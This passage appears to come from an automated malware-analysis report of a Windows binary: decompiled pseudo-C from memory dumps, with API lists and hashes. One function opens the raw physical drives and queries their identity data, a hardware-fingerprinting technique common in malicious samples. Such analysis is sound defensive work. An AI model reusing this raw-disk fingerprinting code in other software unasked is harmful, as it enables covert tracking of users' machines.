                                                                                                                                                      									__eax = __bl & 0x000000ff;
                                                                                                                                                      									__eax = __bl & 4;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eax = __bl & 0x000000ff;
                                                                                                                                                      									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
                                                                                                                                                      									_pop(__ecx);
                                                                                                                                                      									_pop(__ecx);
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__ecx = __bl;
                                                                                                                                                      								_t66 = (__esi + __esi * 4) * 2; // -44
                                                                                                                                                      								__esi = __ecx + _t66 - 0x30;
                                                                                                                                                      								__eflags = __esi - 0x1450;
                                                                                                                                                      								if(__esi > 0x1450) {
                                                                                                                                                      									__esi = 0x1451;
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__bl =  *__edi;
                                                                                                                                                      								__edi = __edi + 1;
                                                                                                                                                      							}
                                                                                                                                                      							_v32 = __esi;
                                                                                                                                                      							while(1) {
                                                                                                                                                      								__eflags =  *0x40ff20 - 1;
                                                                                                                                                      								if( *0x40ff20 <= 1) {
                                                                                                                                                      									__ecx =  *0x40fd10; // 0x40fd1a
                                                                                                                                                      									__eax = __bl & 0x000000ff;
                                                                                                                                                      									__eax = __bl & 4;
                                                                                                                                                      									__eflags = __eax;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eax = __bl & 0x000000ff;
                                                                                                                                                      									__eax = E004075DB(__ecx, __esi, __bl & 0x000000ff, 4);
                                                                                                                                                      									_pop(__ecx);
                                                                                                                                                      									_pop(__ecx);
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = __eax;
                                                                                                                                                      								if(__eax == 0) {
                                                                                                                                                      									break;
                                                                                                                                                      								}
                                                                                                                                                      								__bl =  *__edi;
                                                                                                                                                      								__edi = __edi + 1;
                                                                                                                                                      							}
                                                                                                                                                      							L109:
                                                                                                                                                      							_t148 = _t148 - 1;
                                                                                                                                                      							goto L111;
                                                                                                                                                      						case 0xa:
                                                                                                                                                      							goto L92;
                                                                                                                                                      						case 0xb:
                                                                                                                                                      							__eflags = _a28;
                                                                                                                                                      							if(_a28 == 0) {
                                                                                                                                                      								_push(0xa);
                                                                                                                                                      								__edi = __edi - 1;
                                                                                                                                                      								__eflags = __edi;
                                                                                                                                                      								_pop(__eax);
                                                                                                                                                      								goto L92;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = __bl;
                                                                                                                                                      							_t55 = __edi - 1; // 0x1
                                                                                                                                                      							__ecx = _t55;
                                                                                                                                                      							__eax = __bl - 0x2b;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							_a12 = __ecx;
                                                                                                                                                      							if(__eax == 0) {
                                                                                                                                                      								L89:
                                                                                                                                                      								_push(7);
                                                                                                                                                      								L90:
                                                                                                                                                      								_pop(_t121);
                                                                                                                                                      								goto L7;
                                                                                                                                                      							}
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eax = __eax - 1;
                                                                                                                                                      							__eflags = __eax;
                                                                                                                                                      							if(__eax != 0) {
                                                                                                                                                      								L110:
                                                                                                                                                      								__edi = __ecx;
                                                                                                                                                      								L111:
                                                                                                                                                      								__eflags = _v20;
                                                                                                                                                      								 *_a8 = _t148;
                                                                                                                                                      								if(_v20 == 0) {
                                                                                                                                                      									_t147 = 0;
                                                                                                                                                      									_t123 = 0;
                                                                                                                                                      									_t150 = 0;
                                                                                                                                                      									_t142 = 0;
                                                                                                                                                      									_v24 = 4;
                                                                                                                                                      									L138:
                                                                                                                                                      									_t144 = _a4;
                                                                                                                                                      									_t124 = _t123 | _v44;
                                                                                                                                                      									__eflags = _t124;
                                                                                                                                                      									_t144[1] = _t150;
                                                                                                                                                      									_t144[0] = _t142;
                                                                                                                                                      									_t144[2] = _t124;
                                                                                                                                                      									 *_t144 = _t147;
                                                                                                                                                      									return _v24;
                                                                                                                                                      								}
                                                                                                                                                      								_push(0x18);
                                                                                                                                                      								_pop(_t126);
                                                                                                                                                      								__eflags = _v8 - _t126;
                                                                                                                                                      								if(_v8 <= _t126) {
                                                                                                                                                      									_t127 = _v16;
                                                                                                                                                      								} else {
                                                                                                                                                      									__eflags = _v73 - 5;
                                                                                                                                                      									if(_v73 >= 5) {
                                                                                                                                                      										_t75 =  &_v73;
                                                                                                                                                      										 *_t75 = _v73 + 1;
                                                                                                                                                      										__eflags =  *_t75;
                                                                                                                                                      									}
                                                                                                                                                      									_v8 = _t126;
                                                                                                                                                      									_t127 = _v16 - 1;
                                                                                                                                                      									_v12 = _v12 + 1;
                                                                                                                                                      								}
                                                                                                                                                      								__eflags = _v8;
                                                                                                                                                      								if(_v8 <= 0) {
                                                                                                                                                      									_t147 = 0;
                                                                                                                                                      									_t123 = 0;
                                                                                                                                                      									_t150 = 0;
                                                                                                                                                      									_t142 = 0;
                                                                                                                                                      									goto L129;
                                                                                                                                                      								} else {
                                                                                                                                                      									while(1) {
                                                                                                                                                      										_t127 = _t127 - 1;
                                                                                                                                                      										__eflags =  *_t127;
                                                                                                                                                      										if( *_t127 != 0) {
                                                                                                                                                      											break;
                                                                                                                                                      										}
                                                                                                                                                      										_v8 = _v8 - 1;
                                                                                                                                                      										_v12 = _v12 + 1;
                                                                                                                                                      									}
                                                                                                                                                      									E0040930E(_t148,  &_v96, _v8,  &_v68);
                                                                                                                                                      									_t131 = _v32;
                                                                                                                                                      									__eflags = _v28;
                                                                                                                                                      									if(_v28 < 0) {
                                                                                                                                                      										_t131 =  ~_t131;
                                                                                                                                                      									}
                                                                                                                                                      									_t132 = _t131 + _v12;
                                                                                                                                                      									__eflags = _v36;
                                                                                                                                                      									if(_v36 == 0) {
                                                                                                                                                      										_t132 = _t132 + _a20;
                                                                                                                                                      										__eflags = _t132;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _v40;
                                                                                                                                                      									if(_v40 == 0) {
                                                                                                                                                      										_t132 = _t132 - _a24;
                                                                                                                                                      										__eflags = _t132;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t132 - 0x1450;
                                                                                                                                                      									if(_t132 <= 0x1450) {
                                                                                                                                                      										__eflags = _t132 - 0xffffebb0;
                                                                                                                                                      										if(_t132 >= 0xffffebb0) {
                                                                                                                                                      											E0040A0AC( &_v68, _t132, _a16);
                                                                                                                                                      											_t147 = _v68;
                                                                                                                                                      											_t142 = _v66;
                                                                                                                                                      											_t150 = _v62;
                                                                                                                                                      											_t123 = _v58;
                                                                                                                                                      											goto L129;
                                                                                                                                                      										}
                                                                                                                                                      										_v52 = 1;
                                                                                                                                                      										goto L128;
                                                                                                                                                      									} else {
                                                                                                                                                      										_v48 = 1;
                                                                                                                                                      										L128:
                                                                                                                                                      										_t142 = _a12;
                                                                                                                                                      										_t150 = _a12;
                                                                                                                                                      										_t123 = _a12;
                                                                                                                                                      										_t147 = _a12;
                                                                                                                                                      										L129:
                                                                                                                                                      										__eflags = _v48;
                                                                                                                                                      										if(_v48 == 0) {
                                                                                                                                                      											__eflags = _v52;
                                                                                                                                                      											if(_v52 != 0) {
                                                                                                                                                      												_t147 = 0;
                                                                                                                                                      												_t123 = 0;
                                                                                                                                                      												_t150 = 0;
                                                                                                                                                      												_t142 = 0;
                                                                                                                                                      												__eflags = 0;
                                                                                                                                                      												_v24 = 1;
                                                                                                                                                      											}
                                                                                                                                                      										} else {
                                                                                                                                                      											_t142 = 0;
                                                                                                                                                      											_t123 = 0x7fff;
                                                                                                                                                      											_t150 = 0x80000000;
                                                                                                                                                      											_t147 = 0;
                                                                                                                                                      											_v24 = 2;
                                                                                                                                                      										}
                                                                                                                                                      										goto L138;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							L88:
                                                                                                                                                      							_v28 = _v28 | 0xffffffff;
                                                                                                                                                      							_push(7);
                                                                                                                                                      							_pop(__eax);
                                                                                                                                                      							goto L7;
                                                                                                                                                      					}
                                                                                                                                                      				}
                                                                                                                                                      				L92:
                                                                                                                                                      				if(_t121 == 0xa) {
                                                                                                                                                      					goto L111;
                                                                                                                                                      				}
                                                                                                                                                      				goto L7;
                                                                                                                                                      			}

                                                                                                                                                      0x00409494
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x0040949b
                                                                                                                                                      0x004094a1
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094a7
                                                                                                                                                      0x004094aa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094ac
                                                                                                                                                      0x004094af
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b1
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b4
                                                                                                                                                      0x00409496
                                                                                                                                                      0x00409499
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094e5
                                                                                                                                                      0x004094e8
                                                                                                                                                      0x004094f3
                                                                                                                                                      0x004094f3
                                                                                                                                                      0x004094f9
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00409458
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409458
                                                                                                                                                      0x004094ff
                                                                                                                                                      0x00409502
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409508
                                                                                                                                                      0x00409508
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409508
                                                                                                                                                      0x004094ea
                                                                                                                                                      0x004094ed
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409449
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040950f
                                                                                                                                                      0x00409512
                                                                                                                                                      0x00409512
                                                                                                                                                      0x00409518
                                                                                                                                                      0x0040952b
                                                                                                                                                      0x00409531
                                                                                                                                                      0x00409537
                                                                                                                                                      0x00409537
                                                                                                                                                      0x0040951a
                                                                                                                                                      0x0040951a
                                                                                                                                                      0x0040951f
                                                                                                                                                      0x00409524
                                                                                                                                                      0x00409525
                                                                                                                                                      0x00409526
                                                                                                                                                      0x00409528
                                                                                                                                                      0x00409528
                                                                                                                                                      0x00409539
                                                                                                                                                      0x0040953b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040953d
                                                                                                                                                      0x00409541
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409553
                                                                                                                                                      0x00409543
                                                                                                                                                      0x00409543
                                                                                                                                                      0x00409546
                                                                                                                                                      0x00409549
                                                                                                                                                      0x0040954c
                                                                                                                                                      0x0040954f
                                                                                                                                                      0x0040954f
                                                                                                                                                      0x00409556
                                                                                                                                                      0x00409558
                                                                                                                                                      0x00409558
                                                                                                                                                      0x0040955b
                                                                                                                                                      0x00409561
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409563
                                                                                                                                                      0x00409563
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040956a
                                                                                                                                                      0x0040956e
                                                                                                                                                      0x00409571
                                                                                                                                                      0x00409574
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409583
                                                                                                                                                      0x00409589
                                                                                                                                                      0x0040959c
                                                                                                                                                      0x004095a2
                                                                                                                                                      0x004095a8
                                                                                                                                                      0x004095a8
                                                                                                                                                      0x0040958b
                                                                                                                                                      0x0040958b
                                                                                                                                                      0x00409590
                                                                                                                                                      0x00409595
                                                                                                                                                      0x00409596
                                                                                                                                                      0x00409597
                                                                                                                                                      0x00409599
                                                                                                                                                      0x00409599
                                                                                                                                                      0x004095aa
                                                                                                                                                      0x004095ac
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004095ae
                                                                                                                                                      0x004095b2
                                                                                                                                                      0x004095b4
                                                                                                                                                      0x004095b7
                                                                                                                                                      0x004095ba
                                                                                                                                                      0x004095bd
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c0
                                                                                                                                                      0x004095c3
                                                                                                                                                      0x004095c3
                                                                                                                                                      0x004095c5
                                                                                                                                                      0x004095c7
                                                                                                                                                      0x004095c7
                                                                                                                                                      0x004095ca
                                                                                                                                                      0x004095ca
                                                                                                                                                      0x004095cd
                                                                                                                                                      0x004094dd
                                                                                                                                                      0x004094dd
                                                                                                                                                      0x004094de
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094de
                                                                                                                                                      0x004095d3
                                                                                                                                                      0x004095d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094b6
                                                                                                                                                      0x004094b9
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094bf
                                                                                                                                                      0x004094c2
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094d6
                                                                                                                                                      0x004094c4
                                                                                                                                                      0x004094c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004094cd
                                                                                                                                                      0x004094d0
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409576
                                                                                                                                                      0x00409579
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409780
                                                                                                                                                      0x0040982b
                                                                                                                                                      0x0040982d
                                                                                                                                                      0x0040982f
                                                                                                                                                      0x00409831
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409786
                                                                                                                                                      0x00409787
                                                                                                                                                      0x0040978a
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x0040978c
                                                                                                                                                      0x0040978f
                                                                                                                                                      0x0040978f
                                                                                                                                                      0x0040979f
                                                                                                                                                      0x004097a4
                                                                                                                                                      0x004097ac
                                                                                                                                                      0x004097af
                                                                                                                                                      0x004097b1
                                                                                                                                                      0x004097b1
                                                                                                                                                      0x004097b3
                                                                                                                                                      0x004097b6
                                                                                                                                                      0x004097b9
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097bb
                                                                                                                                                      0x004097be
                                                                                                                                                      0x004097c1
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c3
                                                                                                                                                      0x004097c6
                                                                                                                                                      0x004097cb
                                                                                                                                                      0x004097fd
                                                                                                                                                      0x00409802
                                                                                                                                                      0x00409815
                                                                                                                                                      0x0040981a
                                                                                                                                                      0x0040981d
                                                                                                                                                      0x00409820
                                                                                                                                                      0x00409823
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409826
                                                                                                                                                      0x00409804
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097cd
                                                                                                                                                      0x004097cd
                                                                                                                                                      0x004097d4
                                                                                                                                                      0x004097d4
                                                                                                                                                      0x004097d7
                                                                                                                                                      0x004097da
                                                                                                                                                      0x004097dd
                                                                                                                                                      0x004097e0
                                                                                                                                                      0x004097e0
                                                                                                                                                      0x004097e4
                                                                                                                                                      0x00409846
                                                                                                                                                      0x0040984a
                                                                                                                                                      0x0040984c
                                                                                                                                                      0x0040984e
                                                                                                                                                      0x00409850
                                                                                                                                                      0x00409852
                                                                                                                                                      0x00409852
                                                                                                                                                      0x00409854
                                                                                                                                                      0x00409854
                                                                                                                                                      0x004097e6
                                                                                                                                                      0x004097e6
                                                                                                                                                      0x004097e8
                                                                                                                                                      0x004097ed
                                                                                                                                                      0x004097f2
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x004097f4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x004097e4
                                                                                                                                                      0x004097cb
                                                                                                                                                      0x00409780
                                                                                                                                                      0x00409697
                                                                                                                                                      0x00409697
                                                                                                                                                      0x0040969b
                                                                                                                                                      0x0040969d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00409438
                                                                                                                                                      0x004096af
                                                                                                                                                      0x004096b2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000

                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: +$+$-$-$0$0$0$0$0$1$1$9$9$9$9$9$9$C$E$c$e
                                                                                                                                                      • API String ID: 0-1157002505
                                                                                                                                                      • Opcode ID: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
                                                                                                                                                      • Instruction ID: d9c4bdcfbf6ac4d29bf3bf58d3038f237c571d90b969de57a998632f55ae988e
                                                                                                                                                      • Opcode Fuzzy Hash: b8cf473db7cb9297b07d1d54a8ff804f5d83ba8f2f9f50276f654a47c6e1c30e
                                                                                                                                                      • Instruction Fuzzy Hash: C7E1CD32D69209DEEB258E65C9457EE7BB1AB44304F28443BD401B62C3D77D8D82CB1A
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 46%
                                                                                                                                                      			E00408D68(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                      				intOrPtr* _t4;
                                                                                                                                                      				intOrPtr* _t7;
                                                                                                                                                      				_Unknown_base(*)()* _t11;
                                                                                                                                                      				void* _t14;
                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                      				void* _t17;
                                                                                                                                                      
                                                                                                                                                      				_t14 = 0;
                                                                                                                                                      				_t17 =  *0x4109f8 - _t14; // 0x0
                                                                                                                                                      				if(_t17 != 0) {
                                                                                                                                                      					L4:
                                                                                                                                                      					_t4 =  *0x4109fc; // 0x0
                                                                                                                                                      					if(_t4 != 0) {
                                                                                                                                                      						_t14 =  *_t4();
                                                                                                                                                      						if(_t14 != 0) {
                                                                                                                                                      							_t7 =  *0x410a00; // 0x0
                                                                                                                                                      							if(_t7 != 0) {
                                                                                                                                                      								_t14 =  *_t7(_t14);
                                                                                                                                                      							}
                                                                                                                                                      						}
                                                                                                                                                      					}
                                                                                                                                                      					return  *0x4109f8(_t14, _a4, _a8, _a12);
                                                                                                                                                      				}
                                                                                                                                                      				_t15 = LoadLibraryA("user32.dll");
                                                                                                                                                      				if(_t15 == 0) {
                                                                                                                                                      					L10:
                                                                                                                                                      					return 0;
                                                                                                                                                      				}
                                                                                                                                                      				_t11 = GetProcAddress(_t15, "MessageBoxA");
                                                                                                                                                      				 *0x4109f8 = _t11;
                                                                                                                                                      				if(_t11 == 0) {
                                                                                                                                                      					goto L10;
                                                                                                                                                      				} else {
                                                                                                                                                      					 *0x4109fc = GetProcAddress(_t15, "GetActiveWindow");
                                                                                                                                                      					 *0x410a00 = GetProcAddress(_t15, "GetLastActivePopup");
                                                                                                                                                      					goto L4;
                                                                                                                                                      				}
                                                                                                                                                      			}










                                                                                                                                                      APIs
                                                                                                                                                      • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00406D84,?,Microsoft Visual C++ Runtime Library,00012010,?,0040B658,?,0040B6A8,?,?,?,Runtime Error!Program: ), ref: 00408D7A
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00408D92
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00408DA3
                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 00408DB0
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.364115111.0000000000406000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.363244714.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363412520.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.363715387.0000000000404000.00000040.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364732425.000000000040B000.00000002.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364881659.000000000040D000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364938932.000000000040F000.00000008.00020000.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.364970630.0000000000412000.00000002.00020000.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$LibraryLoad
                                                                                                                                                      • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                                                                                                      • API String ID: 2238633743-4044615076
                                                                                                                                                      • Opcode ID: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
                                                                                                                                                      • Instruction ID: 95536b36c0a73afdfafba42784b12344ea0077410b62820a9f877c3a80c8d56d
                                                                                                                                                      • Opcode Fuzzy Hash: f7850f07079205152cae9b16221561117037284cbd462a1dac085e368bad08e9
                                                                                                                                                      • Instruction Fuzzy Hash: 770175B1641316ABD7509FB55D80E973ED8EEA4790710453EF151F22E1DFB8C8409BAC
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 97%
                                                                                                                                                      			E1001D370(void* __ebx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                      				void* _v8;
                                                                                                                                                      				struct _OVERLAPPED* _v12;
                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                      				signed int _v20;
                                                                                                                                                      				void* _v24;
                                                                                                                                                      				short _v540;
                                                                                                                                                      				char _v1564;
                                                                                                                                                      				long _v1568;
                                                                                                                                                      				long _v1572;
                                                                                                                                                      				intOrPtr _v1576;
                                                                                                                                                      				struct _OVERLAPPED* _v1580;
                                                                                                                                                      				struct _OVERLAPPED* _v1584;
                                                                                                                                                      				struct _OVERLAPPED* _v1588;
                                                                                                                                                      				struct _OVERLAPPED* _v1592;
                                                                                                                                                      				struct _OVERLAPPED* _v1596;
                                                                                                                                                      				struct _OVERLAPPED* _v1600;
                                                                                                                                                      				struct _OVERLAPPED* _v1604;
                                                                                                                                                      				void _v1608;
                                                                                                                                                      				void* __ebp;
                                                                                                                                                      				int _t63;
                                                                                                                                                      				void* _t64;
                                                                                                                                                      				int _t76;
                                                                                                                                                      				void* _t77;
                                                                                                                                                      				void* _t96;
                                                                                                                                                      				void* _t97;
                                                                                                                                                      				void* _t98;
                                                                                                                                                      				void* _t99;
                                                                                                                                                      				void* _t100;
                                                                                                                                                      
                                                                                                                                                      				_t97 = __esi;
                                                                                                                                                      				_t96 = __edi;
                                                                                                                                                      				_t77 = __ebx;
                                                                                                                                                      				_v12 = 0;
                                                                                                                                                      				_v16 = _a4;
                                                                                                                                                      				_v1584 = 0;
                                                                                                                                                      				_v1580 = 0;
                                                                                                                                                      				do {
                                                                                                                                                      					wsprintfW( &_v540, L"\\\\.\\PhysicalDrive%d", _v12);
                                                                                                                                                      					_t99 = _t99 + 0xc;
                                                                                                                                                      					_v24 = CreateFileW( &_v540, 0xc0000000, 7, 0, 3, 0, 0);
                                                                                                                                                      					if(_v24 != 0xffffffff) {
                                                                                                                                                      						_v1572 = 0;
                                                                                                                                                      						_v1608 = 0;
                                                                                                                                                      						_v1604 = 0;
                                                                                                                                                      						_v1600 = 0;
                                                                                                                                                      						_v1596 = 0;
                                                                                                                                                      						_v1592 = 0;
                                                                                                                                                      						_v1588 = 0;
                                                                                                                                                      						_t63 = DeviceIoControl(_v24, 0x74080, 0, 0,  &_v1608, 0x18,  &_v1572, 0);
                                                                                                                                                      						__eflags = _t63;
                                                                                                                                                      						if(_t63 != 0) {
                                                                                                                                                      							_t64 = L1000CE56(_t77,  &_v1608, _t96, _t97, 0x221);
                                                                                                                                                      							_t100 = _t99 + 4;
                                                                                                                                                      							_v8 = _t64;
                                                                                                                                                      							 *((char*)(_v8 + 0xa)) = 0xec;
                                                                                                                                                      							_v1568 = 0;
                                                                                                                                                      							__eflags = DeviceIoControl(_v24, 0x7c088, _v8, 0x21, _v8, 0x221,  &_v1568, 0);
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								L10:
                                                                                                                                                      								CloseHandle(_v24);
                                                                                                                                                      								_push(_v8);
                                                                                                                                                      								E1000CA30(_t77, _t96, _t97, __eflags);
                                                                                                                                                      								_t99 = _t100 + 4;
                                                                                                                                                      								__eflags = _v1584;
                                                                                                                                                      								if(_v1584 == 0) {
                                                                                                                                                      									_v12 = _v1580;
                                                                                                                                                      									goto L13;
                                                                                                                                                      								}
                                                                                                                                                      								break;
                                                                                                                                                      							}
                                                                                                                                                      							_v20 = 0;
                                                                                                                                                      							do {
                                                                                                                                                      								 *(_t98 + _v20 * 4 - 0x618) =  *(_v8 + 0x10 + _v20 * 2) & 0x0000ffff;
                                                                                                                                                      								_v20 = _v20 + 1;
                                                                                                                                                      								__eflags = _v20 - 0x100;
                                                                                                                                                      							} while (_v20 < 0x100);
                                                                                                                                                      							_v1576 = E1001CD70( &_v1564);
                                                                                                                                                      							_t76 = E1001CFA0(_v1576, 0x104, _v16);
                                                                                                                                                      							_t100 = _t100 + 0x10;
                                                                                                                                                      							__eflags = _t76;
                                                                                                                                                      							if(__eflags == 0) {
                                                                                                                                                      								_v1584 = 1;
                                                                                                                                                      							}
                                                                                                                                                      							goto L10;
                                                                                                                                                      						}
                                                                                                                                                      						goto L13;
                                                                                                                                                      					}
                                                                                                                                                      					L13:
                                                                                                                                                      					_v12 =  &(_v12->Internal);
                                                                                                                                                      					_v1580 = _v12;
                                                                                                                                                      				} while (_v12 < 4);
                                                                                                                                                      				return _v1584;
                                                                                                                                                      			}

                                                                                                                                                      APIs
                                                                                                                                                      • wsprintfW.USER32 ref: 1001D3AA
                                                                                                                                                      • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000003,00000000,00000000), ref: 1001D3C9
                                                                                                                                                      • DeviceIoControl.KERNEL32 ref: 1001D442
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.368863529.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.368854964.0000000010000000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.368893520.0000000010023000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370445982.0000000010332000.00000004.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370452016.0000000010337000.00000002.00000001.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.370493444.0000000010338000.00000004.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ControlCreateDeviceFilewsprintf
                                                                                                                                                      • String ID: \\.\PhysicalDrive%d
                                                                                                                                                      • API String ID: 3081802084-2935326385
                                                                                                                                                      • Opcode ID: 695705573c505d6c2190f79248c31773e2dce04a2ed8c2d9fcfd35b4e1f44f30
                                                                                                                                                      • Instruction ID: c19dd4f4148ea860b5569224362e113c716c363f4a93641ea984967bd2cc70da
                                                                                                                                                      • Opcode Fuzzy Hash: 695705573c505d6c2190f79248c31773e2dce04a2ed8c2d9fcfd35b4e1f44f30
                                                                                                                                                      • Instruction Fuzzy Hash: E9513EB4D00318ABEB10DF94DC95BDEB7B5EB84304F108198E509AB280D7B6AA94CF95
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 85%
                                                                                                                                                      			E1000EFFC(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                                                                                                                      				intOrPtr _v0;
                                                                                                                                                      				void* _v804;
                                                                                                                                                      				intOrPtr _v808;
                                                                                                                                                      				intOrPtr _v812;
                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                      				intOrPtr _t11;
                                                                                                                                                      				intOrPtr _t12;
                                                                                                                                                      				intOrPtr _t13;
                                                                                                                                                      				long _t17;
                                                                                                                                                      				intOrPtr _t21;
                                                                                                                                                      				intOrPtr _t22;
                                                                                                                                                      				intOrPtr _t25;
                                                                                                                                                      				intOrPtr _t26;
                                                                                                                                                      				intOrPtr _t27;
                                                                                                                                                      				intOrPtr* _t31;
